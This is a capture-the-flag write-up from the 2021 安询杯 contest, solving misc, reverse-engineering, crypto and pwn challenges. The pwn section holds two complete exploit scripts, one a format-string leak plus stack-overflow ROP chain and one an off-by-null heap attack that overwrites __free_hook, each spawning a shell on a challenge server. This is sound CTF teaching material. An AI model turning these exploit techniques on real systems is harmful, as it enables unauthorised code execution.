2021安询杯wp

2021安询杯wp

Misc

应该算是签到

来得早不如来的巧

img

CyzCC_loves_LOL

小脑洞+老考点,理解一下

其实是放进百度翻译然后一下看出来了

s = 'D0g3isthepAssword'
# Shift every character back by 3; anything that drops below 'A' (65) is
# wrapped forward by 26, which is how digits like '0' and '3' become letters.
flag = ''.join(
    chr(code + 26) if code < 65 else chr(code)
    for code in (ord(ch) - 3 for ch in s)
)
print(flag)

密码为AGdJfpqebmXpptloa

然后解压得到图片和图片(

jpg那个图说是silent,于是知道是silenteye,右边的图不是piet就是brainloller,试了之后发现是brainloller

然后.\bftools.exe decode brainloller .\Program.png,得到的brainfuck解码一下得到0MTTW CWZVN!,空格替换下划线即可

然后silenteye解jpg,密码为0MTTW_CWZVN!

image-20211127132846544

D0g3{544f3225-bbaf-47dc-ba8d-5bda54cbaecb}

Cthulhu Mythos

hint.mp3是sstv,后面那段扫一下即可

image-20211127132323377

解码

image-20211127132339086

根据提示猜测是泰拉瑞亚,去github下载一个地图编辑器

image-20211127132355014

进去就看到7I4YF6QL0

然后猜测剩下的在对话里之类的,之后在分析里找到内容

image-20211127132433518

导出后看txt

image-20211127132453517

按顺序撸下来,得到

image-20211127132535376

emm能看出来前面和后面都有错误,但是前面能知道是D0g3{M1necR4ft_G0_A 后面是d_Try_Terr4ria!}

然后觉得中间填and,尝试提交发现正确,所以flag为

D0g3{M1necR4ft_G0_And_Try_Terr4ria!}

lovemath

爆CRC

image-20211127152845936

得到密码

th1s_Is_Y0ur_pa33w0rd_We1c0m3e

blind是LSB,BGR的,提取出来一个图片纯数字

然后用QQ OCR一下

1251077695482776025338577125579215707216262981842821000162276994967943212822693842845266851984880336702446444408289977864567921038435144120176357529686342977212633764247620567669441602729004003473312468776582473461071462631554533766709934484393185739708817165738912742570170547790145328253304755428563911689057632001795598667127514331122190795355921436735375126688142856470280128821316586008242687241930886868804388482643589009068543771977163419519208340324352

结合题目给的甚至能画出自己

找到了塔珀自指公式,然后github发现有解码的网站

http://keelyhill.github.io/tuppers-formula/

image-20211127153422115

反过来看即可

image-20211127153445210

D0g3{I_LOV3_math}

Pwn

stack

格式化字符串泄露基地址和canary,计算出pop,system,/bin/sh在程序中的地址然后栈溢出即可

from pwn import *
context.log_level='debug'
# Challenge instance named in the writeup.
p = remote('47.108.195.119',20113)
# Two reads before the first send: presumably banner plus prompt — confirm against the binary.
p.recv()
p.recv()
p.send('n03tAck')
p.recv()
p.sendline('Mumuzi')
p.recv()
# Format-string read of two stack slots; the first value is parsed as the canary,
# the second as a code address (the writeup: "泄露基地址和canary").
payload='%11$p%9$p'
p.send(payload)
# 18 chars = "0x" + 16 hex digits (canary); 14 chars = "0x" + 12 hex digits (PIE address).
canary=int(p.recv(18),16)
success("canary:"+hex(canary))
start_addr=int(p.recv(14),16)
success("start_addr:" + hex(start_addr))
# The leaked address sits at image offset 0x870; the three offsets below are
# image-relative values taken from static analysis of the binary.
addrbase=start_addr-0x0870
sys_addr=0x000A8c+addrbase
binsh_addr=0x00B24+addrbase
pop_rdi=0x0000000000000b03+addrbase
success("sys_addr:" + hex(sys_addr))
success("binsh_addr:" + hex(binsh_addr))
success("pop_rdi:" + hex(pop_rdi))
# 0x18 bytes of filler up to the canary, the canary itself, a saved rbp, then the chain.
# NOTE(review): 'a'*(0x18) is str and p64() returns bytes — this concatenation only
# works under Python 2 (or a pwntools that still returns str); on Python 3 it raises TypeError.
payload='a'*(0x18)+p64(canary)+p64(0)+p64(pop_rdi)+p64(binsh_addr)+p64(sys_addr)
p.send(payload)
p.interactive()

连上之后cat sky_token然后exit输入sky_token即可

本来一开始是windows跑的每次exit输入sky_token都显示我错误,只好去打开ubuntu老老实实跑一下了

noleak

1.思路:off by null打__free_hook

from pwn import *

#p=process('./noleak1')
# Challenge instance named in the writeup; the commented process() line is the local variant.
p=remote('47.108.195.119',20182)
context.log_level='debug'
elf=ELF('./noleak1')
# libc.so.6 must be the remote's libc: the __malloc_hook/__free_hook/system
# offsets used later are looked up in this file.
libc=ELF('libc.so.6')
#gdb.attach(p,'b *$rebase(0xfc9)')

# Presumably team name and token for the challenge front-end — confirm.
p.sendline('n03tAck')
p.sendline('1u1u')

# The escaped literal is the ASCII string "N0_py_1n_tHe_ct7".
p.sendlineafter('please input a str:','\x4e\x30\x5f\x70\x79\x5f\x31\x6e\x5f\x74\x48\x65\x5f\x63\x74\x37')

def menu(id):
    """Pick menu entry *id* once the `>` prompt has been received."""
    choice = str(id)
    p.sendlineafter('>', choice)

def add(id, size):
    """Menu option 1: allocate a chunk of *size* bytes in slot *id*."""
    menu(1)
    slot, length = str(id), str(size)
    p.sendlineafter('Index?\n', slot)
    p.sendlineafter('Size?\n', length)

def show(id):
    """Menu option 2: print the contents of slot *id*."""
    menu(2)
    slot = str(id)
    p.sendlineafter('Index?\n', slot)

def edit(id, content):
    """Menu option 3: overwrite slot *id* with *content* (sent via str())."""
    menu(3)
    slot, payload = str(id), str(content)
    p.sendlineafter('Index?\n', slot)
    p.sendlineafter('content:\n', payload)

def delete(id):
    """Menu option 4: free the chunk in slot *id*."""
    menu(4)
    slot = str(id)
    p.sendlineafter('Index?\n', slot)



# Four chunks: 0 and 2 are large, 1 is a small chunk wedged between them,
# 3 keeps chunk 2 away from the top chunk. With glibc's 0x10 header/rounding
# the request sizes give chunk sizes 0x460, 0x20, 0x500, 0x20.
add(0,0x450)
add(1,0x18)
add(2,0x4f0)
add(3,0x18)

# Free chunk 0, then fill all 0x18 usable bytes of chunk 1: the last 8 overlap
# chunk 2's prev_size field, which becomes 0x480 (= 0x460 + 0x20, chunks 0 and 1
# together). The off-by-null the writeup names presumably clears chunk 2's
# PREV_INUSE bit, so freeing chunk 2 merges it backwards over chunk 1 into
# chunk 0 — confirm against the binary's edit() bounds.
# NOTE(review): 'a'*0x10 (str) + p64(...) (bytes) only concatenates under Python 2.
delete(0)
edit(1,'a'*0x10+p64(0x480))
delete(2)

# Re-carve chunk 0 from the merged region; chunk 1 is now inside the free
# remainder, so show(1) prints what the next lines treat as a libc pointer.
add(0,0x450)
show(1)

# Keep the 6 bytes ending in 0x7f (a userspace libc address) and zero-extend to 8.
# NOTE(review): bytes.ljust(8, "\x00") with a str fill is Python 2 only.
leak=u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
# Both constants were read off a debugging session; their difference is -0x70.
malloc_hook=leak+0x7f3223b9bc30-0x7f3223b9bca0
success('malloc_hook:'+hex(malloc_hook))
libc_base=malloc_hook-libc.sym['__malloc_hook']
success('libc_base:'+hex(libc_base))

# A fresh 0x20 chunk is carved where chunk 1 already sits; freeing it puts that
# address in the 0x20 tcache bin, and editing chunk 1 then rewrites the freed
# chunk's next pointer to __free_hook.
add(2,0x18)
delete(2)
edit(1,p64(libc_base+libc.sym['__free_hook']))

# Two 0x20 allocations: the first returns the overlapping chunk, the second
# the address written above, i.e. __free_hook itself.
add(4,0x10)
add(5,0x10)
edit(5,p64(libc_base+libc.sym['system']))

# free() on a chunk holding "/bin/sh" now goes through the overwritten hook.
add(6,0x30)
edit(6,'/bin/sh\x00')
delete(6)

#gdb.attach(p)

p.interactive()

Re

sign_in

一个贪吃蛇游戏(又是一个嵌屎的题)

smc

直接动调,然后手动改跳转进入该函数。

image-20211127223559201

是shuffle+xxtea

先解xxtea

因为我是改条件跳转的,所以要爆破delta。

#include <stdio.h>  
#include <stdint.h>
//#define DELTA (0x44336730+ 0x13)
#define MX (((z>>5^y<<2) + (y>>3^z<<4)) ^ ((sum^y) + (key[((p&3)^e)] ^ z)))

/*
 * Corrected Block TEA (XXTEA) with the round constant passed as a parameter
 * instead of the usual #define, so main() can brute-force it.
 *
 * v     : block of |n| 32-bit words, transformed in place
 * n     : n > 1 encrypts n words, n < -1 decrypts -n words; |n| <= 1 is a no-op
 * key   : four 32-bit key words, read by the MX macro defined at file scope
 * DELTA : per-round constant; every use below converts it to unsigned, so only
 *         its value mod 2^32 matters
 *
 * MX reads y, z, sum, e, p and key from this scope, so the local names and the
 * order of the updates are fixed by the macro — do not rename or reorder.
 */
void btea(uint32_t* v, int n, uint32_t const key[4],int DELTA)
{
    uint32_t y, z, sum;
    unsigned p, rounds, e;
    if (n > 1) /* Coding Part */
    {
        rounds = 6 + 52 / n;
        sum = 0;
        z = v[n - 1];
        do
        {
            sum += DELTA;
            e = (sum >> 2) & 3;
            for (p = 0; p < n - 1; p++)
            {
                y = v[p + 1];
                z = v[p] += MX;      /* each word is mixed with its right neighbour */
            }
            y = v[0];
            z = v[n - 1] += MX;      /* last word wraps around to v[0]; p == n-1 here */
        } while (--rounds);
    }
    else if (n < -1) /* Decoding Part */
    {
        n = -n;
        rounds = 6 + 52 / n;
        sum = rounds * DELTA;        /* the final sum the encrypt loop reached */
        y = v[0];
        do
        {
            e = (sum >> 2) & 3;
            for (p = n - 1; p > 0; p--)
            {
                z = v[p - 1];
                y = v[p] -= MX;
            }
            z = v[n - 1];
            y = v[0] -= MX;          /* p == 0 here, undoing the encrypt side's wrap-around */
            sum -= DELTA;
        } while (--rounds);
    }
}


int main(void)
{
    /* Key words recovered from the binary. */
    uint32_t const k[4] = { 0x44, 0x30, 0x67, 0x33 };
    /* |n| is the block length in words; btea() decrypts when it is passed negated. */
    const int words = 32;
    /* The conditional jump was patched during debugging, so the exact round
     * constant is unknown: try the base value and the next 256 candidates and
     * print every candidate plaintext. */
    const int base_delta = 0x44336730;

    for (int step = 0; step <= 256; step++) {
        int delta = base_delta + step;
        /* Ciphertext dumped from the binary; re-initialised on every iteration
         * because btea() transforms the buffer in place. */
        uint32_t v[32] = {
            0xBF8ED8A5, 0xE115A9F9, 0xFCD3F08A, 0x8BBF8946, 0xC308B162, 0x2B19CF29, 0x7A770656, 0xA4BAE4BA,
            0x4E3E8CE4, 0x01A7E1D9, 0x75E9CE04, 0x22B593B9, 0x497742B4, 0x24EB15F6, 0xF2C2FF0E, 0x47973039,
            0xC801CA0D, 0x6A125861, 0x80320BE8, 0x0385BD47, 0x69F96DDD, 0xE56490D1, 0x2D3CAD4B, 0x2D4200BE,
            0x89EF6979, 0x4A91885D, 0x019DEBC7, 0x3BF8FD96, 0x1BDD2557, 0xB8685FDD, 0x57226614, 0x9F585C28
        };

        printf("%d\n", delta);
        btea(v, -words, k, delta);
        for (int i = 0; i < words; i++) {
            printf("0x%x,", v[i]);
        }
        printf("\n");
    }
    return 0;
}

image-20211127223750854

得到:

0x3c,0x40,0x2b,0x66,0x6f,0x4f,0x5c,0x1d,0x42,0x1a,0x2b,0x57,0x36,0x44,0x33,0x1c,0x1d,0x6b,0x5c,0x6,0xf,0x1c,0x5c,0x1a,0x2b,0x9,0x32,0x6e,0x15,0x5a,0x2c,0x25

然后shuffle可以先算出他的偏移值,然后直接还原就可

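# Bytes obtained from the XXTEA brute force above.
m = [0x3c, 0x40, 0x2b, 0x66, 0x6f, 0x4f, 0x5c, 0x1d, 0x42, 0x1a, 0x2b, 0x57, 0x36, 0x44, 0x33, 0x1c,
     0x1d, 0x6b, 0x5c, 0x6, 0xf, 0x1c, 0x5c, 0x1a, 0x2b, 0x9, 0x32, 0x6e, 0x15, 0x5a, 0x2c, 0x25]
# Position i of the original ended up at position shuffle[i] of m.
shuffle = [0, 6, 17, 27, 18, 7, 1, 8, 19, 28, 20, 9, 2, 10, 21, 29, 22, 11, 3, 12, 23, 30, 24, 13, 4, 14, 25, 31, 26, 15, 5, 16]

# Undo the shuffle. (The original snippet never initialised `d`, so the first
# append raised NameError.)
d = [m[src] for src in shuffle]
print(d)
# Undo the chained XOR: each byte was XORed with its successor (cyclically),
# so walk backwards from the last byte, which is XORed with the already-restored d[0].
for i in reversed(range(len(d))):
    d[i] ^= d[(i + 1) % len(d)]
print(bytearray(d))
# Th4_1mp0rtant_th2n9_is_t0_le@rn!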

virtus

他释放了一个文件?(这是一个拉屎的题)但是我找不到,不知道是不是权限问题,然后我用Resource Hacker直接梭哈出一个资源文件,

image-20211127225240318

发现好多0x41,我想如果是可执行文件,这些0x41应该是0才对,然后我又异或了开头,发现开头为PE头。那就直接全部异或0x41,保存成新文件继续分析。

image-20211127224245096

首先会对flag动手脚,然后会对key做手脚,一开始想爆破,爆破了半天,(最后解出来发现首位是特殊字符,寄!)

首先找到key

def key_de(en: str) -> str:
    """Undo one round of the binary's key transform on the 4-character string *en*.

    Rebuilds the 7-bits-per-character working array ``v2`` that the binary
    uses (its "step3" layout, kept in v2[28:56]), replays the "step2"
    scatter into v2[0:28], and reads the result back as 4 characters.
    The writeup applies this four times to 'Lroo' to obtain '_shy'.
    Only the first 4 characters of *en* are used.
    """
    enc=[]
    for i in range(len(en)):
        enc.append(ord(en[i]))
    v2=[0]*56
    #step3 re: spread the high 6 bits of each char into v2[7*i+28 .. 7*i+33]
    for i in range(4):
        temp=enc[i]
        if temp % 2==1:
            temp-=1
        # The comprehension's `i` is local to it in Python 3 and does not touch the loop index.
        # NOTE(review): this assumes the char code is >= 64 so bin() yields 7 digits and
        # temp[0:6] are bits 6..1; for smaller codes zfill(6) changes the layout — confirm.
        temp=[int(i) for i in bin(temp)[2:].zfill(6)]
        for j in range(6):
            v2[7 * i + 28 + j]=temp[j]
        if enc[i]%2==1:
            j=5
            v2[7 * i + 29 + j]=1   # i.e. v2[7*i+28+6]: the stripped low bit goes in the 7th slot
    a1=[]
    # verify step3: re-derive each char code from v2; `a1` is never used afterwards
    for i in range(4):
        v7 = 0
        for j in range(6):
            v7 = 2 * (v7 + v2[7 * i + 28 + j])
            if (v2[7 * i + 29 + j] == 1 and j == 5):
                v7+=1
        a1.append(v7)

    #step2: scatter v2[28:56] into v2[0:28], row advancing by 1 (mod 4) and column by 2 (mod 7)
    v4=0
    v5=0
    for i in range(4):
        for j in range(7):
            v3=v2[7 * i + 28 + j]
            v2[7 * v5 + v4]=v3
            v5 = (v5 + 1) % 4
            v4 = (v4 + 2) % 7
    f=''
    # Copy each 7-bit group back to the upper half and read it as a character.
    for i in range(4):
        for j in range(6,-1,-1):
            v2[7 * i + 28 + j]=v2[7 * i + j]
        f+=chr(int(''.join(map(str,v2[7 * i + 28 + 0 : 7* i + 28 + 7])),2))
    return f
# The binary applies its key transform four times, so invert it four times.
recovered = 'Lroo'
for _ in range(4):
    recovered = key_de(recovered)
print(recovered)
# _shy

然后再sub_4012F0中发现是sm4的sbox盒,ck,fk都没改

直接找脚本梭哈

class SM4Cipher:
    """Pure-Python SM4 block cipher: 128-bit key, one 16-byte block per call."""

    def __init__(self, key: bytes):
        if len(key) != 16:
            raise ValueError("SM4 key must be length of 16. ")
        self._key_r = self._generate_key(key)
        self.block_size = 16

    def encrypt(self, plaintext: bytes):
        """Encrypt one 16-byte block with the round keys in schedule order."""
        return self._do(plaintext, self._key_r)

    def decrypt(self, ciphertext: bytes):
        """Decrypt one 16-byte block: same round function, round keys reversed."""
        return self._do(ciphertext, self._key_r[::-1])

    def _do(self, text: bytes, key_r: list):
        """Run the 32 SM4 rounds over the first 16 bytes of *text* with *key_r*."""
        rot = self._rot_left
        # 128-bit block -> four big-endian 32-bit words
        words = [int.from_bytes(text[4 * i:4 * i + 4], 'big') for i in range(4)]
        for i in range(32):
            box_out = self._s_box(words[1] ^ words[2] ^ words[3] ^ key_r[i])
            # linear layer L: x ^ (x<<<2) ^ (x<<<10) ^ (x<<<18) ^ (x<<<24)
            mixed = box_out ^ rot(box_out, 2) ^ rot(box_out, 10) ^ rot(box_out, 18) ^ rot(box_out, 24)
            words = words[1:] + [words[0] ^ mixed]
        words.reverse()  # final reversal R
        # four 32-bit words -> 128-bit block
        return b''.join(w.to_bytes(4, 'big') for w in words)

    def _generate_key(self, key: bytes):
        """Derive the 32 round keys from the 128-bit *key* (FK whitening, CK constants)."""
        FK = [0xa3b1bac6, 0x56aa3350, 0x677d9197, 0xb27022dc]
        CK = [0x00070e15, 0x1c232a31, 0x383f464d, 0x545b6269, 0x70777e85, 0x8c939aa1, 0xa8afb6bd, 0xc4cbd2d9,
              0xe0e7eef5, 0xfc030a11, 0x181f262d, 0x343b4249, 0x50575e65, 0x6c737a81, 0x888f969d, 0xa4abb2b9,
              0xc0c7ced5, 0xdce3eaf1, 0xf8ff060d, 0x141b2229, 0x30373e45, 0x4c535a61, 0x686f767d, 0x848b9299,
              0xa0a7aeb5, 0xbcc3cad1, 0xd8dfe6ed, 0xf4fb0209, 0x10171e25, 0x2c333a41, 0x484f565d, 0x646b7279]
        # 128-bit key -> four 32-bit words, each whitened with FK
        state = [int.from_bytes(key[4 * i:4 * i + 4], 'big') ^ FK[i] for i in range(4)]
        round_keys = []
        for ck in CK:
            box_out = self._s_box(state[1] ^ state[2] ^ state[3] ^ ck)
            # key-schedule linear layer L': x ^ (x<<<13) ^ (x<<<23)
            rk = state[0] ^ box_out ^ self._rot_left(box_out, 13) ^ self._rot_left(box_out, 23)
            round_keys.append(rk)
            state = state[1:] + [rk]
        return round_keys

    @staticmethod
    def _s_box(n: int):
        """Apply the SM4 S-box to each of the four bytes of the 32-bit word *n*."""
        BOX = [0xD6, 0x90, 0xE9, 0xFE, 0xCC, 0xE1, 0x3D, 0xB7, 0x16, 0xB6, 0x14, 0xC2, 0x28, 0xFB, 0x2C, 0x05, 0x2B,
               0x67, 0x9A, 0x76, 0x2A, 0xBE, 0x04, 0xC3, 0xAA, 0x44, 0x13, 0x26, 0x49, 0x86, 0x06, 0x99, 0x9C, 0x42,
               0x50, 0xF4, 0x91, 0xEF, 0x98, 0x7A, 0x33, 0x54, 0x0B, 0x43, 0xED, 0xCF, 0xAC, 0x62, 0xE4, 0xB3, 0x1C,
               0xA9, 0xC9, 0x08, 0xE8, 0x95, 0x80, 0xDF, 0x94, 0xFA, 0x75, 0x8F, 0x3F, 0xA6, 0x47, 0x07, 0xA7, 0xFC,
               0xF3, 0x73, 0x17, 0xBA, 0x83, 0x59, 0x3C, 0x19, 0xE6, 0x85, 0x4F, 0xA8, 0x68, 0x6B, 0x81, 0xB2, 0x71,
               0x64, 0xDA, 0x8B, 0xF8, 0xEB, 0x0F, 0x4B, 0x70, 0x56, 0x9D, 0x35, 0x1E, 0x24, 0x0E, 0x5E, 0x63, 0x58,
               0xD1, 0xA2, 0x25, 0x22, 0x7C, 0x3B, 0x01, 0x21, 0x78, 0x87, 0xD4, 0x00, 0x46, 0x57, 0x9F, 0xD3, 0x27,
               0x52, 0x4C, 0x36, 0x02, 0xE7, 0xA0, 0xC4, 0xC8, 0x9E, 0xEA, 0xBF, 0x8A, 0xD2, 0x40, 0xC7, 0x38, 0xB5,
               0xA3, 0xF7, 0xF2, 0xCE, 0xF9, 0x61, 0x15, 0xA1, 0xE0, 0xAE, 0x5D, 0xA4, 0x9B, 0x34, 0x1A, 0x55, 0xAD,
               0x93, 0x32, 0x30, 0xF5, 0x8C, 0xB1, 0xE3, 0x1D, 0xF6, 0xE2, 0x2E, 0x82, 0x66, 0xCA, 0x60, 0xC0, 0x29,
               0x23, 0xAB, 0x0D, 0x53, 0x4E, 0x6F, 0xD5, 0xDB, 0x37, 0x45, 0xDE, 0xFD, 0x8E, 0x2F, 0x03, 0xFF, 0x6A,
               0x72, 0x6D, 0x6C, 0x5B, 0x51, 0x8D, 0x1B, 0xAF, 0x92, 0xBB, 0xDD, 0xBC, 0x7F, 0x11, 0xD9, 0x5C, 0x41,
               0x1F, 0x10, 0x5A, 0xD8, 0x0A, 0xC1, 0x31, 0x88, 0xA5, 0xCD, 0x7B, 0xBD, 0x2D, 0x74, 0xD0, 0x12, 0xB8,
               0xE5, 0xB4, 0xB0, 0x89, 0x69, 0x97, 0x4A, 0x0C, 0x96, 0x77, 0x7E, 0x65, 0xB9, 0xF1, 0x09, 0xC5, 0x6E,
               0xC6, 0x84, 0x18, 0xF0, 0x7D, 0xEC, 0x3A, 0xDC, 0x4D, 0x20, 0x79, 0xEE, 0x5F, 0x3E, 0xD7, 0xCB, 0x39,
               0x48]
        # 32 bits -> 4 bytes, substitute each, and reassemble big-endian
        substituted = bytes(BOX[b] for b in n.to_bytes(4, 'big'))
        return int.from_bytes(substituted, 'big')

    @staticmethod
    def _rot_left(n, m):
        """Rotate the 32-bit value *n* left by *m* bits."""
        return ((n << m) | (n >> (32 - m))) & 0xFFFFFFFF
key = bytes.fromhex("68677f4e555b4e777b65785b4c726f6f")  # 128-bit key recovered from the binary
plaintext = bytes.fromhex("00112233445566778899aabbccddeeff")  # 128-bit sample block
sm4 = SM4Cipher(key)
print(sm4.encrypt(plaintext).hex())  #
from Crypto.Util.number import *
# 5C89EEF56FC54492DBE3AE9CB54F4AF4E7A35E0FFC93FC766CFB29E0162FA567
# NOTE(review): _do() only reads the first 16 bytes of its input, so this call
# decrypts just the first half of the 32-byte value; the 32-byte `s` below
# presumably comes from decrypting both halves — confirm.
print(sm4.decrypt(long_to_bytes(0x5C89EEF56FC54492DBE3AE9CB54F4AF4E7A35E0FFC93FC766CFB29E0162FA567)))
# Undo the binary's final XOR layer: even positions were XORed with 6, odd ones with 7.
s = b'Nh5XOXC\x7fv4eSccYi6Xv^Y6hXrocXEs`&'
a = [s[pos] ^ (6 if pos % 2 == 0 else 7) for pos in range(0, 32)]
print(bytearray(a))

# Ho3_I_Exp3cTed_n0_pY_1n_the_Ctf!

Mazeeee

(找屎的题)

32位程序,ida载入

 if ( v5 == 22 )
{
v18 = 0;
while ( 2 ) // 22步数
{
if ( v18 >= 22 )
{
if ( off_3E0074[150 * dword_3E0284 + 15 * dword_3E027C + unk_3E0248] == 'E' )
{
v15 = v4;
v6 = sub_3D13D4(v4, input);
sub_3D1316(v4[0]); // 进一步的check
}
/*查看地图一共750B,结合150*z+15*y+x判断为三维迷宫 15*10*5
且在22步从00到终点*/
v6 = (v6 - 'S');
switch ( v6 ) {
case 0u:
--dword_3E0284;
...
case 4u:
++dword_3E0284;
...
case 0xEu:
--unk_3E0248;
...//等推导出如何对(x,y,z)进行移动
}
"""
S 下一层
W 上一层
a 左移动1
d 右边移动2
s 向上一行
w 向下两行
"""

打印出地图,三维迷宫路径上只能为O或E,从S出发最终到E,走22步到达,路径规模比较小,直接手过迷宫即可。

S # O # # # # # # O # # # # # 
# # # O # # # # # # # # # # #
# # # # # # # # # # # # # # #
# # # # # # # # # # # # # # #
# # # # # O # # # # # # # # #
# # # # # # # # # # # # # # #
# # # # # O # # O # # # # # #
# # # # O # # # # # # # # # #
# # # # # # # # # # # O # # #
# # # # # # # # # # # # # # #

# # O # # # O # # # # # O # #
# # # # # # # # # # # # O # #
# # # O # # # O # # # # # # #
# # # # # # O # # # # # # # #
# # # # # # O # O O # # # # #
# # # # # # # # # # # # # # #
# # # # # O # # # # # # # # #
# # # # # # O # # # # # # # #
# # # # # # # # # # # # # # #
# # # # # # # # # # # # # # #

# # O # # # # # # O # # # # #
# # # # # # # # # # O # # # #
# # O # # # # # # # # # # # #
# # # # # # # # # # # # O O #
# # O # O # O O O # # # # # #
# # # # # # # # # # # # # # O
# # # # # # # # # # # # # # #
# # # # # # # # # # # # # # #
# # # O # # # # # O # # # # #
# # # # # # # # # # # # # # #

# # # # # # # # # # # # # # #
# # # # O # # # # # # # # # #
# # # O # # # # # # # # # # #
# # O # # # # # # # # # # # #
# # O # # # # # O # # # # # #
# # # # # # # # # O O # # # #
# # # # # # # # # # # O # # #
# # # # O # # # # E # # # # #
# # # # # # # # # # # # # # #
# # # # # # # # # # # # # # #

# # O # # # # # # # # # # # O
# # O # # # # # # # # # # # #
# # # # # # # # # # # # # # #
# # # # # # # # O O # # # # #
# # # # # # O O O # # # # # #
# # # # # # # # # # O # # # #
# # # # # # O # # # O # # # #
# # # # # # # # # # O # # # #
# # # # # # O # O # O # O # #
# # # O # # # # # # # # # # #
//dWWwwdddWWaawwddsssSaw

调试程序下载msvcr100d.dll最新版放在同目录下,下断点到有congratulation处。

  for ( i = 0; i < 44; ++i )
{
v1 = sub_3D13ED(&a1); // v1是长度
v2 = sub_3D1262(&a1, i % v1);
sub_3D14AB(byte_3E024C[i] ^ *v2); // v2是输入的迷宫路径
}
//byte_3E024C全为0,交叉引用发现另一处变化。
void __stdcall sub_3D1D80()
{
int i; // [esp+D0h] [ebp-8h]

for ( i = 1; i < 44; ++i )
byte_3E0000[i] = byte_3E024B[i] & 0xE0 | byte_3E024C[i] & 0x1F;
byte_3E0000[0] = byte_3E0277 & 0xE0 | byte_3E024C[0] & 0x1F;
}
//已知byte_3E0000,反求右侧,这里直接用z3求解

如下:

from z3 import *
# One 8-bit unknown per byte of byte_3E024C (the array XORed with the maze path).
kk=[BitVec('a%d'%i,8) for i in range(44)]
# byte_3E0000 as dumped from the binary.
enc=[0x0E, 0x5D, 0x7D, 0x7D, 0x5D, 0x4E, 0x4E, 0x4E, 0x5D, 0x7D, 0x6B, 0x4B, 0x5D, 0x5D, 0x4E, 0x4E, 0x59, 0x59, 0x59, 0x59, 0x6B, 0x5D, 0x53, 0x24, 0x7B, 0x34, 0x07, 0x49, 0x01, 0x1B, 0x23, 0x27, 0x7E, 0x35, 0x3F, 0x12, 0x1B, 0x29, 0x32, 0x09, 0x16, 0x12, 0x60, 0x4A]
tmp=[0]*44
s=Solver()
# Mirror sub_3D1D80: byte_3E0000[i] = byte_3E024B[i] & 0xE0 | byte_3E024C[i] & 0x1F,
# i.e. the high 3 bits come from the previous unknown and the low 5 from the current one.
for i in range(1,44):
    tmp[i]=(kk[i-1]&0xe0)| (kk[i]&0x1f)
    s.add(tmp[i]==enc[i])
# Index 0 pairs with byte_3E0277 in the binary; only the low 5 bits are modelled here.
# NOTE(review): nothing constrains the top 3 bits of a43 (a0's are fixed through tmp[1]),
# so the solver picks them freely; key[43] feeds the last printed character — it came
# out as '}' below, so the pick happened to be 0. Confirm with an explicit constraint if reused.
tmp[0]=kk[0]&0x1f
s.add(tmp[0]==enc[0])
s.check()
m=s.model()
key=[]
for i in range(44):
    key.append(m[kk[i]].as_long())
print()
# NOTE(review): `b` is not defined in this snippet; from the decompiled loop
# (byte_3E024C[i] ^ path[i % len]) it is presumably the 22-character maze path
# dWWwwdddWWaawwddsssSaw — confirm. Only key[22:44] is used, the second half of the flag.
for i in range(22):
    print(chr(ord(b[i])^key[i+22]),end='')
#W3lc0me_t0_The_Maze!!}

这样拿到flag后半段是对的,前半段根据hint在strings窗口查看,发现一串base64,直接解码是乱码,对base64表交叉引用发现表经过了变化,即base64换表,写脚本还原即可。

 """
for ( j = 0; j < 63; j += 2 )
sub_3D121C(&byte_3E0030[j], &basetable[j]);// 交换函数
"""
import base64
# The binary swaps every adjacent pair of the standard alphabet (see the loop quoted
# above), so `new` is the table the ciphertext was actually encoded with.
base = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'
new = ''.join(base[k + 1] + base[k] for k in range(0, 63, 2))
enc = 'QCAmN2sYNGUfR3EvOUMuNWYkW3k1JR=='
# Map each symbol back to the standard alphabet; padding (or anything not in the
# table) is emitted as '='.
c = ''.join(base[new.index(ch)] if ch in new else '=' for ch in enc)
print(c)
print(base64.b64decode(c))
# D0g3{Y0u^Can=So1ve_it!
# flag: D0g3{Y0u^Can=So1ve_it!W3lc0me_t0_The_Maze!!}

Crypto

little_trick

签到题,给了p,q,c但是没给e,dp和dq被分别按位加密了,只需要挨个还原即可。需要注意的是加密dq那儿用的是py2,需要用py2跑随机数;还原出dp,dq后,再由已知的dp,dq,p,q解密。

# RSA parameters given by the challenge: the two primes and the ciphertext.
p=119494148343917708105807117614773529196380452025859574123211538859983094108015678321724495609785332508563534950957367289723559468197440246960403054020452985281797756117166991826626612422135797192886041925043855329391156291955066822268279533978514896151007690729926904044407542983781817530576308669792533266431

q=125132685086281666800573404868585424815247082213724647473226016452471461555742194042617318063670311290694310562746442372293133509175379170933514423842462487594186286854028887049828613566072663640036114898823281310177406827049478153958964127866484011400391821374773362883518683538899757137598483532099590137741

c=10238271315477488225331712641083290024488811710093033734535910573493409567056934528110845049143193836706122210303055466145819256893293429223389828252657426030118534127684265261192503406287408932832340938343447997791634435068366383965928991637536875223511277583685579314781547648602666391656306703321971680803977982711407979248979910513665732355859523500729534069909408292024381225192240385351325999798206366949106362537376452662264512012770586451783712626665065161704126536742755054830427864982782030834837388544811172279496657776884209756069056812750476669508640817369423238496930357725842768918791347095504283368032
from Crypto.Util.number import *
import random
import gmpy2
import os


# CRT exponents recovered by the two commented-out scripts further down
# (one per digit from small-modulus RSA, the other from a Python-2 random() XOR stream).
dq=23458591381644494879596426183878928641891759871602961070839457303969747353773411708437315165237216481430908369709167907047043280248152040749469402814146054871536032870746473649690743697560576735624528397398691515920649222501258921802372365480019200479555430922883680472732415240714991623845227274793947921407
dp=104137587579880166582178434901328539485184135240660490271571544307637817287517428663992284342411864826922600858353966205614398977234519495034539643954586905495941906386407181383904043194285771983919780892934288899562700746832428876894943676937141813284454381136254907871626581989544814547778881240129496262777

def decrypt(p, q, dq, dp, c):
    """Rebuild the private exponent from its CRT pieces and print the plaintext.

    In this signature dq is d mod (q-1) and dp is d mod (p-1). The call site
    in the writeup passes (p, q, dp, dq, c), i.e. swapped relative to these
    names; since the reported output was correct, the data labels are
    presumably swapped the same way — verify before reusing.
    """
    n = p * q
    g = gmpy2.gcd(p - 1, q - 1)
    # Garner-style lift: start from dq and add the multiple of (q-1) that makes
    # the result congruent to dp modulo (p-1); the gcd handles non-coprime moduli.
    lift = (dp - dq) // g * gmpy2.invert((q - 1) // g, (p - 1) // g)
    d = lift * (q - 1) + dq
    print(long_to_bytes(pow(c, d, n)))
# Keyword form makes the argument order explicit: the recovered values are
# passed swapped relative to decrypt's (dq, dp) parameter names, exactly as
# the original positional call did.
decrypt(p=p, q=q, dq=dp, dp=dq, c=c)
